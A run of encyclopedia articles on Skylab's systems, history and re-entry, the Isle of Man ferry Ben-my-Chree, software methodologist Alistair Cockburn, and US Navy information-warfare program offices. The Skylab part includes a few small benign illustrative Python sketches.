The Skylab film vaults were used for storing film from various sources, including the Apollo Telescope Mount solar instruments. Six ATM experiments used film to record data, and over the course of the missions over 150,000 successful exposures were recorded. The film canisters had to be manually retrieved during crewed spacewalks to the instruments. The film canisters were returned to Earth aboard the Apollo capsules when each mission ended, and were among the heaviest items that had to be returned at the end of each mission. The heaviest canisters weighed 40 kg and could hold up to 16,000 frames of film.
Gyroscopes
There were two types of gyroscopes on Skylab. Control-moment gyroscopes (CMG) could physically move the station, and rate gyroscopes measured the rate of rotation to find its orientation. The CMG helped provide the fine pointing needed by the Apollo Telescope Mount, and to resist various forces that can change the station's orientation.
Some of the forces acting on Skylab that the pointing system needed to resist:
Gravity gradient
Aerodynamic disturbance
Internal movements of crew.
Skylab was the first large spacecraft to use big gyroscopes capable of controlling its attitude. The control could also be used to help point the instruments. The gyroscopes took about ten hours to spin up if they had been turned off. There was also a thruster system to control Skylab's attitude. There were nine rate-gyroscope sensors, three for each axis, which fed their output to the Skylab digital computer. Two of the three on each axis were active and their input was averaged, while the third was a backup. From NASA SP-400 Skylab, Our First Space Station: "each Skylab control-moment gyroscope consisted of a motor-driven rotor, electronics assembly, and power inverter assembly. The 21-inch diameter rotor weighed and rotated at approximately 8950 revolutions per minute".
There were three control-moment gyroscopes on Skylab, but only two were required to maintain pointing. The control and sensor gyroscopes were part of a system that helped detect and control the orientation of the station in space. Other sensors that helped with this were a Sun tracker and a star tracker. The sensors fed data to the main computer, which could then use the control gyroscopes and/or the thruster system to keep Skylab pointed as desired.
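The averaging-with-backup arrangement of the rate gyroscopes can be illustrated with a small sketch. This is not flight software: the disagreement threshold and the rule for substituting the backup sensor are hypothetical, chosen only to show how two active sensors per axis might be averaged with a third held in reserve.

    # Illustrative sketch (not Skylab flight code): combining three rate-gyroscope
    # readings for one axis. Two active gyros are averaged; the third is a backup.
    # The fault test and threshold below are hypothetical.

    DISAGREEMENT_LIMIT = 0.5  # deg/s tolerance between the two active gyros (assumed)

    def axis_rate(active_a, active_b, backup):
        """Return a single rotation-rate estimate for one axis from three sensors."""
        if abs(active_a - active_b) <= DISAGREEMENT_LIMIT:
            return (active_a + active_b) / 2.0  # normal case: average the active pair
        # The active pair disagrees: pair the backup with whichever active gyro
        # it agrees with more closely (a simple majority-style substitution).
        if abs(backup - active_a) <= abs(backup - active_b):
            return (active_a + backup) / 2.0
        return (active_b + backup) / 2.0

    print(axis_rate(0.10, 0.12, 0.11))  # prints approximately 0.11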
Shower
Skylab had a zero-gravity shower system in the work and experiment section of the Orbital Workshop, designed and built at the Manned Spacecraft Center. It had a cylindrical curtain that went from floor to ceiling and a vacuum system to suck away water. The floor of the shower had foot restraints.
To bathe, the user coupled a pressurized bottle of warmed water to the shower's plumbing, then stepped inside and secured the curtain. A push-button shower nozzle was connected by a stiff hose to the top of the shower. The system was designed for about 6 pints (2.8 liters) of water per shower, the water being drawn from the personal hygiene water tank. The use of both the liquid soap and water was carefully planned out, with enough soap and warm water for one shower per week per person.
The first astronaut to use the space shower was Paul J. Weitz on Skylab 2, the first crewed mission. He said, "It took a fair amount longer to use than you might expect, but you come out smelling good". A Skylab shower took about two and a half hours, including the time to set up the shower and dissipate used water. The procedure for operating the shower was as follows:
Fill up the pressurized water bottle with hot water and attach it to the ceiling
Connect the hose and pull up the shower curtain
Spray down with water
Apply liquid soap and spray more water to rinse
Vacuum up all the fluids and stow items.
One of the big concerns with bathing in space was control of water droplets, so that they did not cause an electrical short by floating into the wrong area. The vacuum water system was thus integral to the shower. The vacuum fed to a centrifugal separator, filter, and collection bag to allow the system to vacuum up the fluids. Waste water was injected into a disposal bag which was in turn put in the waste tank. The material for the shower enclosure was fire-proof beta cloth wrapped around hoops of diameter; the top hoop was connected to the ceiling. The shower could be collapsed to the floor when not in use. Skylab also supplied astronauts with rayon terrycloth towels which had color-coded stitching for each crew member. There were 420 towels on board Skylab initially.
A simulated Skylab shower was also used during the 56-day SMEAT simulation; the crew used the shower after exercise and found it a positive experience.
Cameras and film
There was a variety of hand-held and fixed experiments that used various types of film. In addition to the instruments in the ATM solar observatory, 35 and 70 mm film cameras were carried on board. A TV camera was carried that recorded video electronically. These electronic signals could be recorded to magnetic tape or be transmitted to Earth by radio signal. The TV camera was not a digital camera of the type that became common in the later decades, although Skylab did have a digital computer using microchips on board.
It was determined that film would fog due to radiation over the course of the mission. To prevent this, film was stored in the vaults.
Personal (hand-held) camera equipment:
Television camera
Westinghouse color
25–150 mm zoom
16 mm film camera (Maurer), called the 16 mm Data Acquisition Camera. The DAC was capable of very low frame rates, such as for engineering data films, and it had independent shutter speeds. It could be powered from a battery or from Skylab itself. It used interchangeable lenses, and various lens and film types were used during the missions.
There were different options for frame rates: 2, 4, 6, 12 and 24 frames per second
Lenses available: 5, 10, 18, 25, 75, and 100 mm
Films used:
Ektachrome film
SO-368 film
SO-168 film
Film for the DAC was contained in DAC film magazines, which held up to 140 feet (42.7 m) of film. At 24 frames per second this was enough for about 4 minutes of filming, with progressively longer filming times at lower frame rates, such as about 16 minutes at 6 frames per second (the arithmetic is sketched after this equipment list). The film had to be loaded or unloaded from the DAC in a photographic dark room.
35 mm film cameras (Nikon)
There were 5 Nikon 35 mm film cameras on board, with 55 mm and 300 mm lenses.
They were specially modified Nikon F cameras
The cameras were capable of interchangeable lenses.
35mm films included:
Ektachrome
SO-368
SO-168
2485 type film
2443 type film
70 mm film camera (Hasselblad)
This had an electric data camera system with Reseau plate
Films included
70 mm Ektachrome
SO-368 film
Lenses: 70 mm lens, 100 mm lens.
Experiment S190B was the Actron Earth Terrain Camera.
The S190A was the Multispectral Photographic Camera:
This consisted of six 70 mm cameras
Each was an Itek 70 mm boresighted camera
Lenses were f/2.8 with a 21.2° field of view.
There was also a Polaroid SX-70 instant camera, and a pair of Leitz Trinovid 10 × 40 binoculars modified for use in space to aid in Earth observations.
The SX-70 was used to take pictures of the extreme-ultraviolet monitor by Dr. Garriott, as the monitor provided a live video feed of the solar corona in ultraviolet light as observed by the Skylab solar observatory instruments located in the Apollo Telescope Mount.
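The film-magazine figures quoted above for the DAC can be checked with a quick calculation. The only added assumption is the standard 40 frames per foot of 16 mm film; the 140-foot magazine capacity and the frame rates come from the text.

    # Rough check of the DAC film-magazine figures, assuming the standard
    # 40 frames per foot of 16 mm film (an assumption; capacity and frame
    # rates are taken from the text above).

    FRAMES_PER_FOOT = 40   # standard for 16 mm film
    MAGAZINE_FEET = 140

    frames = MAGAZINE_FEET * FRAMES_PER_FOOT  # 5,600 frames per magazine
    for fps in (24, 6, 2):
        minutes = frames / fps / 60
        print(f"{fps:>2} fps -> about {minutes:.0f} minutes of filming")
    # 24 fps -> about 4 minutes; 6 fps -> about 16 minutes; 2 fps -> about 47 minutes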
Computers
Skylab was controlled in part by a digital computer system, and one of its main jobs was to control the pointing of the station; pointing was especially important for its solar power collection and observatory functions. The computer consisted of two actual computers, a primary and a secondary. The system ran several thousand words of code, which was also backed up on the Memory Load Unit (MLU). The two computers were linked to each other and various input and output items by the workshop computer interface. Operations could be switched from the primary to the backup, which were the same design, either automatically if errors were detected, by the Skylab crew, or from the ground.
The Skylab computer was a space-hardened and customized version of the TC-1 computer, a version of the IBM System/4Pi, itself based on the IBM System/360. The TC-1 had a 16,000-word memory based on ferrite memory cores, while the MLU was a read-only tape drive that contained a backup of the main computer programs. The tape drive took 11 seconds to upload the backup of the software program to a main computer. The TC-1 used 16-bit words, and its central processor came from the 4Pi computer. There was a 16k and an 8k version of the software program.
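A back-of-the-envelope calculation gives a feel for how small that memory was by modern standards; the word count and word length are from the text, and the byte conversion is simply the usual 8 bits per byte.

    # Size of the TC-1's core memory, from the figures above:
    WORDS = 16_000        # 16,000-word ferrite-core memory
    BITS_PER_WORD = 16    # 16-bit words

    total_bits = WORDS * BITS_PER_WORD
    print(total_bits, "bits")                      # 256,000 bits
    print(total_bits // 8, "bytes (about 32 KB)")  # 32,000 bytes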
The computer had a mass of 100 pounds (45.4 kg), and consumed about ten percent of the station's electrical power.
Apollo Telescope Mount Digital Computer
Attitude and Pointing Control System (APCS)
Memory Load Unit (MLU).
After launch, the computer was what controllers on the ground communicated with to control the station's orientation. When the sun shield was torn off, ground staff had to balance solar heating against electrical production. On March 6, 1978, NASA re-activated the computer system to control the re-entry.
The system had a user interface that consisted of a display, ten buttons, and a three-position switch. Because the numbers were in octal (base-8), it only had numbers zero to seven (8 keys), and the other two keys were enter and clear. The display could show minutes and seconds which would count down to orbital benchmarks, or it could display keystrokes when using the interface. The interface could be used to change the software program. The user interface was called the Digital Address System (DAS) and could send commands to the computer's command system. The command system could also get commands from the ground.
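As a rough illustration of how an octal-only keypad like the DAS might accumulate a value, consider the following sketch. The key set (digits 0–7, enter, and clear) is taken from the description above; how the real command system interpreted the entered word is not described here, so the handling below is purely hypothetical.

    # Minimal sketch of octal keystroke entry on a DAS-like keypad.
    # Keys "0"-"7" shift in one octal digit; "CLEAR" resets; "ENTER" finishes.
    # The command handling itself is hypothetical.

    def das_entry(keystrokes):
        """Accumulate octal keystrokes into an integer value."""
        value = 0
        for key in keystrokes:
            if key == "CLEAR":
                value = 0
            elif key == "ENTER":
                return value                     # hand the finished word onward
            else:
                value = value * 8 + int(key, 8)  # shift in one octal digit
        return value

    print(oct(das_entry(["1", "7", "3", "ENTER"])))  # prints 0o173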
For personal computing needs, Skylab crews were equipped with the then-new hand-held electronic scientific calculator, the Hewlett-Packard HP-35, which replaced the slide rules used on prior space missions as the primary personal calculating device. Some slide rules continued in use aboard Skylab, and a circular slide rule was at the workstation.
Plans for re-use after the last mission
The three crewed Skylab missions used only about 16.8 of the 24 man-months of oxygen, food, water, and other supplies stored aboard Skylab. A fourth crewed mission was under consideration, which would have used the launch vehicle kept on standby for the Skylab Rescue mission. This would have been a 20-day mission to boost Skylab to a higher altitude and do more scientific experiments. Another plan was to use a Teleoperator Retrieval System (TRS) launched aboard the Space Shuttle (then under development), to robotically re-boost the orbit. When Skylab 5 was cancelled, it was expected Skylab would stay in orbit until the 1980s, which was enough time to overlap with the beginning of Shuttle launches. Other options for launching TRS included the Titan III and Atlas-Agena. No option received the level of effort and funding needed for execution before Skylab's sooner-than-expected re-entry.
The Skylab 4 crew left a bag filled with supplies to welcome visitors, and left the hatch unlocked. Skylab's internal systems were evaluated and tested from the ground, and effort was put into plans for re-using it as late as 1978. NASA discouraged any discussion of additional visits due to the station's age, but in 1977 and 1978, when the agency still believed the Space Shuttle would be ready by 1979, it completed two studies on reusing the station. By September 1978, the agency believed Skylab was safe for crews, with all major systems intact and operational. It still had 180 man-days of water and 420 man-days of oxygen, and astronauts could refill both; the station could hold up to about 600 to 700 man-days of drinkable water and 420 man-days of food. Before Skylab 4 departed, its crew performed one final boost, running Skylab's thrusters for three minutes and raising the orbit by 11 km; Skylab was left in a 433 by 455 km orbit on departure. At this time, the NASA-accepted estimate for its re-entry was nine years.
The studies cited several benefits from reusing Skylab, which one called a resource worth "hundreds of millions of dollars" with "unique habitability provisions for long duration space flight". Because no more operational Saturn V rockets were available after the Apollo program, four to five shuttle flights and extensive space architecture would have been needed to build another station as large as Skylab's volume. Its ample size – much greater than that of the shuttle alone, or even the shuttle plus Spacelab – was enough, with some modifications, for up to seven astronauts of both sexes, and experiments needing a long duration in space; even a movie projector for recreation was possible.
Proponents of Skylab's reuse also said repairing and upgrading Skylab would provide information on the results of long-duration exposure to space for future stations. The most serious issue for reactivation was attitude control, as one of the station's gyroscopes had failed and the attitude control system needed refueling; fixing these problems would have required EVAs. The station had not been designed for extensive resupply. However, although it was originally planned that Skylab crews would only perform limited maintenance, they successfully made major repairs during EVA, such as the Skylab 2 crew's deployment of the solar panel and the Skylab 4 crew's repair of the primary coolant loop. The Skylab 2 crew fixed one item during EVA by, reportedly, "hit[ting] it with [a] hammer".
Some studies also said, beyond the opportunity for space construction and maintenance experience, reactivating the station would free up shuttle flights for other uses, and reduce the need to modify the shuttle for long-duration missions. Even if the station were not crewed again, went one argument, it might serve as an experimental platform.
Shuttle mission plans
The reactivation would likely have occurred in four phases:
An early Space Shuttle flight would have boosted Skylab to a higher orbit, adding five years of operational life. The shuttle might have pushed or towed the station, but attaching a space tug – the Teleoperator Retrieval System (TRS) – to the station would have been more likely, based on astronauts' training for the task. Martin Marietta won the contract for US$26 million to design the apparatus. TRS would contain about three tons of propellant. The remote-controlled booster had TV cameras and was designed for duties such as space construction and servicing and retrieving satellites the shuttle could not reach. After rescuing Skylab, the TRS would have remained in orbit for future use. Alternatively, it could have been used to de-orbit Skylab for a safe, controlled re-entry and destruction.
In two shuttle flights, Skylab would have been refurbished. In January 1982, the first mission would have attached a docking adapter and conducted repairs. In August 1983, a second crew would have replaced several system components.
In March 1984, shuttle crews would have attached a solar-powered Power Expansion Package, refurbished scientific equipment, and conducted 30- to 90-day missions using the Apollo Telescope Mount and the Earth resources experiments.
Over five years, Skylab would have been expanded to accommodate six to eight astronauts, with a new large docking/interface module, additional logistics modules, Spacelab modules and pallets, and an orbital vehicle space dock using the shuttle's external tank.
The first three phases would have required about US$60 million in 1980s dollars, not including launch costs. Other options for launching TRS were Titan III or Atlas-Agena.
After departure
After a final boost by Skylab 4's Apollo CSM before its departure in 1974, Skylab was left in a parking orbit of about 433 by 455 km that was expected to last until at least the early 1980s, based on estimates of the 11-year sunspot cycle that began in 1976. NASA had first considered the potential risks of a space station reentry in 1962, but decided not to incorporate a retrorocket system in Skylab due to cost and acceptable risk.
The spent 49-ton Saturn V S-II stage which had launched Skylab in 1973 remained in orbit for almost two years, and made a controlled reentry on January 11, 1975. The re-entry was mistimed, however, and the stage came down slightly earlier in its orbit than planned.
Solar activity
British mathematician Desmond King-Hele of the Royal Aircraft Establishment (RAE) predicted in 1973 that Skylab would de-orbit and crash to Earth in 1979, sooner than NASA's forecast, because of increased solar activity. Greater-than-expected solar activity heated the outer layers of Earth's atmosphere and increased drag on Skylab. By late 1977, NORAD also forecast a reentry in mid-1979; a National Oceanic and Atmospheric Administration (NOAA) scientist criticized NASA for using an inaccurate model for the second most-intense sunspot cycle in a century, and for ignoring NOAA predictions published in 1976.
The reentry of the USSR's nuclear-powered Cosmos 954 in January 1978, and the resulting radioactive debris fall in northern Canada, drew more attention to Skylab's orbit. Although Skylab did not contain radioactive materials, the State Department warned NASA about the potential diplomatic repercussions of station debris. Battelle Memorial Institute forecast that up to 25 tons of metal debris could land in 500 pieces along a long, narrow ground track. The lead-lined film vault, for example, might land intact at 400 feet per second.
Ground controllers re-established contact with Skylab in March 1978 and recharged its batteries. Although NASA worked on plans to reboost Skylab with the Space Shuttle through 1978 and the TRS was almost complete, the agency gave up in December 1978 when it became clear that the shuttle would not be ready in time; its first flight, STS-1, did not occur until April 1981. Also rejected were proposals to launch the TRS using one or two uncrewed rockets or to attempt to destroy the station with missiles.
Re-entry and debris
Skylab's demise in 1979 was an international media event, with T-shirts and hats with bullseyes and "Skylab Repellent" with a money-back guarantee, wagering on the time and place of re-entry, and nightly news reports. The San Francisco Examiner offered a US$10,000 prize for the first piece of Skylab delivered to its offices; the competing San Francisco Chronicle offered US$200,000 if a subscriber suffered personal or property damage. A Nebraska neighborhood painted a target so that the station would have "something to aim for", a resident said.
A report commissioned by NASA calculated that the odds were 1 in 152 of debris hitting any human, and odds of 1 in 7 of debris hitting a city of 100,000 people or more. Special teams were readied to head to any country hit by debris. The event caused so much panic in the Philippines that President Ferdinand Marcos appeared on national television to reassure the public.
A week before re-entry, NASA forecast that it would occur between July 10 and 14, with the 12th the most likely date, and the Royal Aircraft Establishment (RAE) predicted the 14th. In the hours before the event, ground controllers adjusted Skylab's orientation to minimize the risk of re-entry on a populated area. They aimed the station at a spot south-southeast of Cape Town, South Africa, and re-entry began at approximately 16:37 UTC, July 11, 1979. The station did not burn up as fast as NASA expected. Due to a four-percent calculation error, debris landed east of Perth, Western Australia, and was found between Esperance, Western Australia and Rawlinna, from 31° to 34° S and 122° to 126° E, within roughly a 130–150 km (81–93 mile) radius of Balladonia, Western Australia. Residents and an airline pilot saw dozens of colorful flares as large pieces broke up in the atmosphere; the debris landed in an almost unpopulated area, but the sightings still caused NASA to fear human injury or property damage. The Shire of Esperance light-heartedly fined NASA A$400 for littering. (The fine was written off three months later, but was eventually paid on behalf of NASA in April 2009, after Scott Barley of Highway Radio raised the funds from his morning show listeners.)
Stan Thornton found 24 pieces of Skylab at his home in Esperance, and a Philadelphia businessman flew him, his parents, and his girlfriend to San Francisco, where he collected the Examiner prize and another US$1,000 from the businessman. The Miss Universe 1979 pageant was scheduled for July 20, 1979, in Perth, and a large piece of Skylab debris was displayed on the stage. Analysis of the debris showed that the station had disintegrated at a lower altitude than expected.
After the demise of Skylab, NASA focused on the reusable Spacelab module, an orbital workshop that could be deployed with the Space Shuttle and returned to Earth. The next American major space station project was Space Station Freedom, which was merged into the International Space Station in 1993 and launched starting in 1998. Shuttle-Mir was another project and led to the US funding Spektr, Priroda, and the Mir Docking Module in the 1990s.
Launchers, rescue, and cancelled missions
Launchers
Launch vehicles:
SA-206 (Skylab 2)
SA-207 (Skylab 3)
SA-208 (Skylab 4)
SA-209 (Skylab Rescue, not launched)
Skylab Rescue
There was a Skylab Rescue mission assembled for the second crewed mission to Skylab, but it was not needed. Another rescue vehicle was assembled for the last Skylab mission and was also on standby for ASTP. That launch stack might have been used for Skylab 5 (which would have been the fourth crewed Skylab mission), but this was cancelled and the SA-209 Saturn IB rocket was put on display at NASA Kennedy Space Center.
Skylab 5
Skylab 5 would have been a short 20-day mission to conduct more scientific experiments and use the Apollo's Service Propulsion System engine to boost Skylab into a higher orbit. Vance Brand (commander), William B. Lenoir (science pilot), and Don Lind (pilot) would have been the crew for this mission, with Brand and Lind being the prime crew for the Skylab Rescue flights. Brand and Lind also trained for a mission that would have aimed Skylab for a controlled deorbit.
The mission would have launched in April 1974 and supported later use by the Space Shuttle by boosting the station to higher orbit.
Skylab B
In addition to the flown Skylab space station, a second flight-quality backup Skylab space station had been built during the program. NASA considered using it for a second station in May 1973 or later, to be called Skylab B (S-IVB 515), but decided against it. Launching another Skylab with another Saturn V rocket would have been very costly, and it was decided to spend this money on the development of the Space Shuttle instead. The backup is on display at the National Air and Space Museum in Washington, D.C.
Engineering mock-ups
A full-size training mock-up once used for astronaut training is located at the Lyndon B. Johnson Space Center visitor's center in Houston, Texas. Another full-size training mock-up is at the U.S. Space & Rocket Center in Huntsville, Alabama. Originally displayed indoors, it was subsequently stored outdoors for several years to make room for other exhibits. To mark the 40th anniversary of the Skylab program, the Orbital Workshop portion of the trainer was restored and moved into the Davidson Center in 2013. NASA transferred Skylab B (the backup Skylab) to the National Air and Space Museum in 1975. On display in the Museum's Space Hall since 1976, the orbital workshop has been slightly modified to permit viewers to walk through the living quarters.
Mission designations
The numerical identification of the crewed Skylab missions was the cause of some confusion. Originally, the uncrewed launch of Skylab and the three crewed missions to the station were numbered SL-1 through SL-4. During the preparations for the crewed missions, some documentation was created with a different scheme – SLM-1 through SLM-3 – for those missions only. William Pogue credits Pete Conrad with asking the Skylab program director which scheme should be used for the mission patches, and the astronauts were told to use 1–2–3, not 2–3–4. By the time NASA administrators tried to reverse this decision, it was too late, as all the in-flight clothing had already been manufactured and shipped with the 1–2–3 mission patches.
NASA Astronaut Group 4 and NASA Astronaut Group 6 were scientists recruited as astronauts. They and the scientific community hoped to have two on each Skylab mission, but Deke Slayton, director of flight crew operations, insisted that two trained pilots fly on each.
SMEAT
The Skylab Medical Experiment Altitude Test or SMEAT was a 56-day (8-week) Earth analog Skylab test. The test had a low-pressure high oxygen-percentage atmosphere but it operated under full gravity, as SMEAT was not in orbit. The test had a three-astronaut crew with Commander Robert Crippen, Science Pilot Karol J. Bobko, and Pilot William E. Thornton; there was a focus on medical studies and Thornton was an M.D. The crew lived and worked in the pressure chamber, converted to be like Skylab, from July 26 to September 20, 1972.
Program cost
From 1966 to 1974, the Skylab program cost a total of US$2.2 billion. As its three three-person crews spent 510 total man-days in space, each man-day cost approximately US$20 million in inflation-adjusted terms, compared to US$7.5 million for the International Space Station.
Summary
Depictions in film
The 1969 film Marooned depicts three astronauts stranded in orbit after visiting the unnamed Apollo Applications Program space lab.
The 1974 episode of The Six Million Dollar Man "Rescue of Athena One" has Farrah Fawcett's Major Woods character using Skylab as an emergency shelter after experiencing an event while piloting a space mission, with Lee Majors's Steve Austin character coming to Skylab on the rescue rocket mission.
David Wain's 2001 comedy film Wet Hot American Summer depicts a fictionalized version of Skylab's re-entry, in which debris from the station is expected to land on a summer camp in Maine.
The documentary Searching for Skylab was released online in March 2019. It was written and directed by Dwight Steven-Boniecki and was partly crowdfunded.
The alternate history Apple TV+ original series For All Mankind depicts the use of the space station in the first episode of the second season, surviving to the 1980s and coexisting with the Space Shuttle program in the alternate timeline.
In the 2011 film Skylab, a family gathers in France and waits for the station to fall out of orbit. It was directed by Julie Delpy.
The 2021 Indian film Skylab depicts fictitious incidents in a Telangana village preceding the disintegration of the space station.
Gallery
See also
Timeline of longest spaceflights
Skylab II (proposed space station)
"Spacelab", a 1978 song by Kraftwerk
Solar panels on spacecraft
References
Footnotes
Works cited
Further reading
SP-402 A New Sun: The Solar Results from Skylab
Skylab Mission Evaluation – NASA report (PDF format)
Skylab Reactivation Mission Report 1980 – NASA report (PDF format)
External links
Voices of Oklahoma interview with William Pogue. First person interview conducted with William Pogue on 8 August 2012. Original audio and transcript archived with Voices of Oklahoma oral history project.
NASA
NASA History Series Publications (many of which are on-line)
SP-4011 Skylab, a Chronology (1977)
SP-401 Skylab, Classroom in Space (1977)
SP-399 Skylab EREP Investigations Summary (1978)
SP-402 A New Sun: Solar Results from Skylab (1979)
SP-404 Skylab's Astronomy and Space Sciences (1979)
NASA Educational Film
Airlock Module under construction (1971) (Medium)
Airlock and Docking Module together (1972) (Medium)
Skylab Crew Quarters Illustration
Apollo (in foreground) and Skylab space food (M487)
Third party
Skylab Collection, The University of Alabama in Huntsville Archives and Special Collections
Leland F. Belew Collection, The University of Alabama in Huntsville Archives and Special Collections Files of Leland Belew, Skylab's project manager.
eoPortal: Skylab
Historic Spacecraft: Skylab
Skylab reboost module
Skylab Reentry (Chapter 9 of SP-4208)
Skylab cutaway drawing from Encyclopædia Britannica
Cutaway line drawing of Skylab
Skylab "Christmas tree"
Satellites formerly orbiting Earth
Extravehicular activity
Crewed spacecraft
NASA space stations
Space stations
Spacecraft launched in 1973
Spacecraft which reentered in 1979
Spacecraft launched by Saturn rockets
Wernher von Braun
|
14382750
|
https://en.wikipedia.org/wiki/MS%20Ben-my-Chree
|
MS Ben-my-Chree
|
MV Ben-my-Chree is a Ro-Pax vessel which was launched and entered service in 1998. The flagship of the Isle of Man Steam Packet Company, she primarily operates on the Douglas to Heysham route. The Royal New Zealand Navy multi-role vessel HMNZS Canterbury, based on Ben-my-Chree's design, entered service in 2007.
History
Ben-my-Chree was ordered in 1997 by Sea Containers for the Isle of Man Steam Packet Company. Costing around £24 million, she was built by van der Giessen de Noord of the Netherlands and launched on 4 April 1998. The sixth vessel to carry the name, she is registered in Douglas, Isle of Man.
Ben-my-Chree entered service on 5 July 1998, Tynwald Day - the Isle of Man's national holiday. At a gross tonnage of around 12,000, she was the largest ship to enter service with the company. The vessel received criticism due to her low passenger capacity of 500 (carrying no more than 350 per sailing), and the fact she had no open deck for passengers. The company insisted this was a "comfort level" for the vessel's size.
In 2004, the vessel underwent a refit carried out by Cammell Laird to increase passenger capacity with the addition of a new passenger module. In 2014, Ben-my-Chree underwent a £1.6 million refit, also carried out by Cammell Laird, which included new LED lighting in the lounge areas and a refurbished crew rest area.
Incidents
On 25 July 2008, Ben-my-Chree suffered a technical failure, with the Viking taking her Heysham sailing until she was repaired.
On 26 March 2010, Ben-my-Chree moved unexpectedly while berthed at Heysham Port, causing a walkway to collapse and trapping eight people in the gangway compartment of the shore access structure; they were helped out by the fire service.
On the evening of 1 May 2013, while arriving in Douglas Harbour from Heysham, Ben-my-Chree struck part of the King Edward Pier linkspan. The ship was slightly damaged in the collision, and the evening departure to Heysham was delayed by two hours, with Manannan arriving from Liverpool as a replacement. The service arrived at Heysham only around thirty minutes late. Ben-my-Chree re-entered service the following day with a freight-only sailing to Heysham, and full service resumed from that point onwards.
In December 2011, Ben-my-Chree suffered a number of cancelled sailings due to high winds and a problem with a bow thruster that had been damaged in May that year. Arrangements to dry dock the ship in June and then in September had to be cancelled after the manufacturer, Wärtsilä, failed to complete the necessary repairs. The chief executive of the Steam Packet Company wrote to the local newspaper, the Manx Independent, to express the company's frustration at the ongoing problems.
On 12 February 2015, Ben-my-Chree lost control while entering Douglas Harbour; her stern made contact with Battery Pier and with a fishing boat at its mooring. Both the ship and the fishing boat suffered only superficial damage. Divers checked the ship for damage to the propellers and steering, and she was then moved to the Victoria Pier by tug so passengers could disembark.
On 2 May 2015, the morning sailing from Douglas to Heysham and the afternoon return were cancelled because Ben-my-Chree's "bow thruster... [was] only operating on reduced power". On 16 May 2015, a suspected chimney stack lagging fire was detected on the 8.45 am crossing from Douglas to Heysham. The sailing arrived in Heysham Port around an hour late and no passengers or crew were injured.
On 12 February 2017, the vessel made contact with the pier at Douglas whilst attempting to moor in high winds on arrival from Birkenhead; other fleet vessels were planned to take over the freight and passenger duties. On 9 April 2017, Ben-my-Chree suffered an engine failure after arriving at Heysham Port. As a result, two return crossings were cancelled and the vessel limped back to Douglas on one engine without passengers.
Design and construction
Ben-my-Chree is a Ro-Pax ferry, largely designed to carry freight, with two vehicle decks (decks 3 and 5) and two passenger accommodation decks (7 and 8). There are 20 four-berth cabins and crew accommodation for 22. Her freight capacity is 200 vehicles (1,235 lane metres).
A refit during her first winter improved passenger accommodation. Reclining chairs were added in the forward and aft lounges and partitions added between the restaurant and bar areas. In 2004, a major refit allowed her to carry a full capacity of 636 passengers. A new accommodation section containing the Legends café/bar, Niarbyl Quiet Lounge and toilets was added. The refit also created an outside deck space and modifications were made to the vessel's stern door. Another refit in April 2008 included a new livery and internal refit.
The Royal New Zealand Navy multi-role vessel HMNZS Canterbury, based on Ben-my-Chree's design, entered service in 2007.
Service
On 16 July 2018, Ben-my-Chree completed 20 years of Manx service. She operates primarily on the Douglas to Heysham route, with occasional services to Belfast.
Future replacement
In March 2013, the chairman of local group TravelWatch, Brendan O’Friel, said "The Ben is currently mid-way through her life and she is starting now to develop problems of one sort or another. She is not as reliable as she was. A replacement would take two years to build and we are keen to see plans go ahead." In Issue 17 of the company newsletter, Steam Packet Times, Chief Executive Mark Woodward explained that "Now that the refinancing has been completed we have begun the process of assessing the longer term - it is clear that the most significant investment in the coming years will be replacement vessels for Ben-my-Chree and Manannan."
In May 2016, the Isle of Man Steam Packet Company outlined plans to replace the Ben-my-Chree as part of their proposed Strategic Sea Services offer to the Isle of Man Government. Under the proposal, the 1998-built Ben-my-Chree would be "replaced by 2019–2021" with a new build vessel that would be 140-metres long and have a capacity of 800 passengers. The Ben-my-Chree would then be retained as a third vessel to offer cover to the fleet.
On 1 December 2020 the replacement for the Ben-my-Chree was named MV Manxman. On Christmas Eve 2021 she was laid down at Hyundai Mipo Dockyard to be in commission by spring 2023.
References
Ships of the Isle of Man Steam Packet Company
Ferries of the Isle of Man
Merchant ships of the Isle of Man
1998 ships
Ships built in the Netherlands
Passenger ships of the United Kingdom
|
5126682
|
https://en.wikipedia.org/wiki/Alistair%20Cockburn
|
Alistair Cockburn
|
Alistair Cockburn is an American computer scientist, known as one of the initiators of the agile movement in software development. He cosigned (with 17 others) the Manifesto for Agile Software Development.
Life and career
Cockburn started studying the methods of object-oriented (OO) software development while working for IBM. In 1994, he formed "Humans and Technology" in Salt Lake City. He obtained his degree in computer science at Case Western Reserve University, and in 2003 he received his PhD from the University of Oslo.
Cockburn helped write the Manifesto for Agile Software Development in 2001, the agile PM Declaration of Interdependence in 2005, and co-founded the International Consortium for Agile in 2009 (with Ahmed Sidky and Ash Rofail). He is a principal expositor of the use case for documenting business processes and behavioral requirements for software, and inventor of the Cockburn Scale for categorizing software projects.
The methodologies in the Crystal family (e.g., Crystal Clear), described by Alistair Cockburn, are considered examples of lightweight methodology. The Crystal family is colour-coded to signify the "weight" of methodology needed. Thus, a large project which has consequences that involve risk to human life would use the Crystal Sapphire or Crystal Diamond methods. A small project might use Crystal Clear, Crystal Yellow or Crystal Orange.
Cockburn presented his Hexagonal Architecture (2005) as a solution to problems with traditional layering, coupling and entanglement.
In 2015, Cockburn launched the Heart of Agile movement, presented as a response to the overly complex state of the agile industry.
Selected publications
Surviving Object-Oriented Projects, Alistair Cockburn, 1st edition, December 1997, Addison-Wesley Professional.
Writing Effective Use Cases, Alistair Cockburn, 1st edition, January 2000, Addison-Wesley Professional.
Agile Software Development, Alistair Cockburn, 1st edition, December 2001, Addison-Wesley Professional.
Patterns for Effective Use Cases, Steve Adolph, Paul Bramble, with Alistair Cockburn and Andy Pols, contributors, August 2002, Addison-Wesley Professional.
People and Methodologies in Software Development, Alistair Cockburn, February 2003, D.Ph. dissertation, University of Oslo Press.
Crystal Clear: A Human-Powered Methodology for Small Teams, Alistair Cockburn, October 2004, Addison-Wesley Professional.
Agile Software Development: The Cooperative Game, Alistair Cockburn, 2nd edition, October 2006, Addison-Wesley Professional.
References
External links
Website
Living people
American computer programmers
American technology writers
1953 births
Case Western Reserve University alumni
University of Oslo alumni
People from Salt Lake City
Agile software development
|
65713407
|
https://en.wikipedia.org/wiki/Naval%20Information%20Warfare%20Systems%20Command%20Program%20Executive%20Offices
|
Naval Information Warfare Systems Command Program Executive Offices
|
The Naval Information Warfare Systems Command Program Executive Offices (PEOs) are organizations responsible for the prototyping, procurement, and fielding of C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance and Reconnaissance), business information technology and space systems. Their mission is to develop, acquire, field and sustain affordable and integrated state of the art equipment for the Navy.
